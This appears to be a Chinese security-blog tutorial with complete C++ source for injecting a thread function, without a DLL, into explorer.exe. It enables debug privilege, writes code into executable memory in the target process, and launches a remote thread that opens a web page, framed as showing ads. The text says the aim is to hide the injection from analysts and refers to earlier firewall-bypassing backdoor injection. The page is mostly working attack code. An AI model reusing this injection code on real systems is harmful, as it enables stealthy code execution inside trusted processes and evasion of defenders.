安全之路 —— 无DLL文件实现远程线程注入

简介

        在之前的章节中，笔者曾介绍过有关于远程线程注入的知识，将后门.dll文件注入explorer.exe中实现绕过防火墙反弹后门。但一个.exe文件总要在注入时捎上一个.dll文件着实是怪麻烦的，那么有没有什么方法能够不适用.dll文件实现注入呢？
        答案是有的，我们可以直接将功能写在线程函数中，然后直接将整个函数注入，这个方法相较之于DLL注入会稍微复杂一些，适用于对一些体积比较小的程序进行注入。但是要注意动态链接库的地址重定位问题，因为正常的文件一般会默认载入kernel32.dll文件，而不会载入其他DLL，且只有kernel32.dll与user32.dll文件可以保证在本地和目的进程中的加载地址是一样的，所以最好要在远程线程函数中手动利用LoadLibrary和GetProcessAddress函数强制加载一遍DLL文件。Visual Studio在编译此类功能的文件时建议关闭编译器的“/GS”选项，还要其他需要注意的地方可参考此链接。
        下面我们借助此方法实现让Windows资源管理器explorer.exe实现弹网页（发广告）的功能，而分析人员却无法从程序依赖的动态链接库中找到我们注入线程用的DLL文件，达到了一定的隐藏效果。

代码实现

//////////////////////////////
//
// FileName : InjectProcess.cpp
// Creator : PeterZheng
// Date : 2018/8/18 0:35
// Comment : Inject Process Without Dll File
//
//////////////////////////////

#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <string>
#include <string.h>
#include <windows.h>
#include <strsafe.h>
#include <tlhelp32.h>

#define MAX_LENGTH 50
#define NORMAL_LENGTH 20
#pragma warning(disable:4996)

using namespace std;

//远程线程函数参数
typedef struct _RemoteParam
{
	CHAR szOperation[NORMAL_LENGTH];
	CHAR szAddrerss[MAX_LENGTH];
	CHAR szLb[NORMAL_LENGTH];
	CHAR szFunc[NORMAL_LENGTH];
	LPVOID lpvMLAAdress;
	LPVOID lpvMGPAAddress;
	LPVOID lpvSEAddress;
}RemoteParam;

//远程线程函数（主体）
DWORD WINAPI ThreadProc(RemoteParam *lprp)
{
	typedef HMODULE(WINAPI *MLoadLibraryA)(IN LPCTSTR lpFileName);
	typedef FARPROC(WINAPI *MGetProcAddress)(IN HMODULE hModule, IN LPCSTR lpProcName);
	typedef HINSTANCE(WINAPI *MShellExecuteA)(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
	MLoadLibraryA MLA;
	MGetProcAddress MGPA;
	MShellExecuteA MSE;
	MLA = (MLoadLibraryA)lprp->lpvMLAAdress;
	MGPA = (MGetProcAddress)lprp->lpvMGPAAddress;
	lprp->lpvSEAddress = (LPVOID)MGPA(MLA(lprp->szLb), lprp->szFunc);
	MSE = (MShellExecuteA)lprp->lpvSEAddress;
	MSE(NULL, lprp->szOperation, lprp->szAddrerss, NULL, NULL, SW_SHOWNORMAL);
	return 0;
}

//获取PID
DWORD GetProcessID(CHAR *ProcessName)
{
	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(pe32);
	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE)
	{
		printf("CreateToolhelp32Snapshot error");
		return 0;
	}
	BOOL bProcess = Process32First(hProcessSnap, &pe32);
	while (bProcess)
	{
		if (strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)
			return pe32.th32ProcessID;
		bProcess = Process32Next(hProcessSnap, &pe32);
	}
	CloseHandle(hProcessSnap);
	return 0;
}

//获取权限
int EnableDebugPriv(const TCHAR *name)
{
	HANDLE hToken;
	TOKEN_PRIVILEGES tp;
	LUID luid;
	if (!OpenProcessToken(GetCurrentProcess(),
		TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
		&hToken))
	{
		printf("OpenProcessToken Error!\n");
		return 1;
	}
	if (!LookupPrivilegeValue(NULL, name, &luid))
	{
		printf("LookupPrivilege Error!\n");
		return 1;
	}
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	tp.Privileges[0].Luid = luid;
	if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
	{
		printf("AdjustTokenPrivileges Error!\n");
		return 1;
	}
	return 0;
}

//远程线程注入函数
BOOL InjectProcess(const DWORD dwPid)
{
	if (EnableDebugPriv(SE_DEBUG_NAME)) return FALSE;
	HANDLE hWnd = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
	if (!hWnd) return FALSE;
	RemoteParam rp;
	ZeroMemory(&rp, sizeof(RemoteParam));
	rp.lpvMLAAdress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "LoadLibraryA");
	rp.lpvMGPAAddress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "GetProcAddress");
	StringCchCopy(rp.szLb, sizeof(rp.szLb), "Shell32.dll");
	StringCchCopy(rp.szFunc, sizeof(rp.szFunc), "ShellExecuteA");
	StringCchCopy(rp.szAddrerss, sizeof(rp.szAddrerss), "https://www.baidu.com");
	StringCchCopy(rp.szOperation, sizeof(rp.szOperation), "open");
	RemoteParam *pRemoteParam = (RemoteParam *)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!pRemoteParam) return FALSE;
	if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;
	LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!pRemoteThread) return FALSE;
	if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;
	HANDLE hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);
	if (!hThread) return FALSE;
	return TRUE;
}

//主函数
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
	CHAR szProcName[MAX_LENGTH] = "\0";
	StringCchCopy(szProcName, MAX_LENGTH, "explorer.exe");
	InjectProcess(GetProcessID(szProcName));
	ExitProcess(0);
	return 0;
}